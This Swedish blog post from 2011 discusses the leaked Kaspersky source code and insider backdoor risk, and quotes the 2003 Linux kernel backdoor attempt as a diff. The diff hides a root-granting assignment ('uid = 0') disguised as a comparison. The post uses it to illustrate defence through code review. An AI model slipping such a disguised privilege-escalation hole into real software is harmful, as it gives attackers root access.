tisdag 1 februari 2011

Kaspersky källkod ute på vift

Källkoden till Kaspersky Internet Security skvalpar runt ute på Internet. Enligt Kaspersky själva har den gjort så sedan November. Enligt rapporter är det en f.d. missnöjd anställd som stal koden i början av 2008, som han sedan försökte sälja på svarta marknaden.

Vilka skulle vara intresserade av att köpa kod? Förmodligen virusmakare som vill veta exakt hur de ska skriva sina virus för att de ska undgå upptäckt. Skulle de även vara intresserade av att känna till en planterad bakdörr i Kaspersky? Kanske. Men det skulle vara svårare för en opportunist att plantera en snygg bakdörr och skulle vara förknippat med större risk. Att kopiera ut kod är något som många bolag helt saknar spårbarhet för, medan det för incheckning av kod sannolikt finns loggar som bevaras i flera år.

Flera av de bakdörrar som har kommit i ljuset har varit lite klumpigt skrivna och ganska uppenbara. Men en bakdörr kan också vara elegant dold som en sårbarhet, som bara är en i mängden om den upptäcks... På det här området är det självfallet sämre med exempel eftersom vi sällan kan veta om det fanns avsikt eller inte. Det förekommer ibland spekulationer, men det enda exemplet vi är säkra på är då Linux kärnan utsattes för ett backdoor-försök år 2003. Följande ändring smögs då in:
--- GOOD        2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
              schedule();
              goto repeat;
      }
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
      retval = -ECHILD;
end_wait4:
      current->state = TASK_RUNNING;

.. men själva ändringen utlöste problem eftersom incheckningen inte hade skett på standardsätt. Det hela tycks ha upptäckts tack vare ett vaket och medvetet open source community.

Som jag skrev igår så har just open source ofta gynnsamma förutsättningar när det kommer till att skydda sig mot säkerhetshot. Samtidigt har man en större utsatthet när kod accepteras från diverse håll. Om det gör open source säkrare eller inte... jag låter den frågan vara, för den är egentligen lika ointressant som vad som är säkrast; PC eller Mac? Det handlar inte om några absoluta siffror, det handlar om hot och risk - något som kan variera väsentligt beroende på verksamhet.

Prova tanken att den Kaspersky-anställde istället för att bara ha stulit kod, istället planterat en subtil bakdörr i den. När skulle den hittats? (och vilka skulle betala för att känna till bakdörren? skulle någon betala för att den alls skulle planteras dit? varför? hur mycket?)
Upplagd av kl.
Etiketter:

Inga kommentarer:

Skicka en kommentar

Prenumerera på: Kommentarer till inlägget (Atom)